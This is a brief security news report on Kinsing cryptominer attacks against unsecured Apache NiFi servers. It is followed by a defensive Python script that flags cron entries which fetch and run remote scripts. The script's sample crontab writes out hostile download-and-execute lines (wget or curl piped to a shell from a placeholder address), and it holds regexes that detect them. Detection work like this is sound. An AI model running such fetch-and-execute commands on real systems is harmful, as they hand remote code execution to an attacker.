Vulnerable Apache NiFi implementations are being targeted in new attacks deploying the Kinsing cryptomining malware, as indicated by the significant increase in HTTP requests for "/nifi" on May 19, according to The Hacker News.
After gaining initial access to unprotected Apache NiFi instances, attackers have been deploying a shell script that disables the firewall and terminates cryptomining tools before downloading and executing the Kinsing malware, a report from the SANS Internet Storm Center revealed.
Timed processors or cron entries have been used to give the malware persistence, while the attack scripts have been kept in memory only, according to SANS Technology Institute Dean of Research Dr. Johannes Ullrich.
"Due to its use as a data processing platform, NiFi servers often have access to business-critical data. NiFi servers are likely attractive targets as they are configured with larger CPUs to support data transformation tasks. The attack is trivial if the NiFi server is not secured," said SANS ISC.
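The cron persistence and memory-only scripts described above point to one check a defender can run on a NiFi host: look for cron entries that fetch a script and execute it in the same step. This is an added example, not code from the SANS ISC report; it assumes the memory-only script is fetched and piped straight into a shell, and the sample crontab and the function names `cron_command` and `suspicious_cron_entries` are constructed for illustration.

```python
import re

# A fetch tool piped straight into a shell: the script runs from the pipe and
# is never written to disk. (Assumed pattern, not quoted from the report.)
FETCH_PIPE = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|da|z)?sh\b"
)
# Same effect through command substitution: sh -c "$(curl ...)".
FETCH_SUBST = re.compile(r"\b(?:ba|da|z)?sh\s+-c\s+[\"']?\$\((?:curl|wget)\b")
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")


def cron_command(line):
    """Return the command part of a crontab line, or None if it has none."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    # "@reboot cmd" has one schedule field, "m h dom mon dow cmd" has five.
    fields = 1 if line.startswith("@") else 5
    parts = line.split(None, fields)
    return parts[fields] if len(parts) > fields else None


def suspicious_cron_entries(crontab_text):
    """List (line_number, command) for entries that fetch and execute in one step."""
    hits = []
    for number, line in enumerate(crontab_text.splitlines(), start=1):
        command = cron_command(line)
        if command and (FETCH_PIPE.search(command) or FETCH_SUBST.search(command)):
            hits.append((number, command))
    return hits


# Constructed sample crontab; 192.0.2.10 is a documentation address.
SAMPLE = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
* * * * * wget -q -O - http://192.0.2.10/x.sh | sh > /dev/null 2>&1
@reboot curl -fsSL http://192.0.2.10/x.sh | bash
15 4 * * 0 curl -fsS -o /var/tmp/report.json https://example.com/report
"""

if __name__ == "__main__":
    for number, command in suspicious_cron_entries(SAMPLE):
        print(f"line {number}: {command}")
```

Run it against the output of `crontab -l` for the account NiFi runs as and against the files under `/etc/cron.d`; system crontabs carry an extra user field, which the search tolerates because it scans the whole remainder of the line.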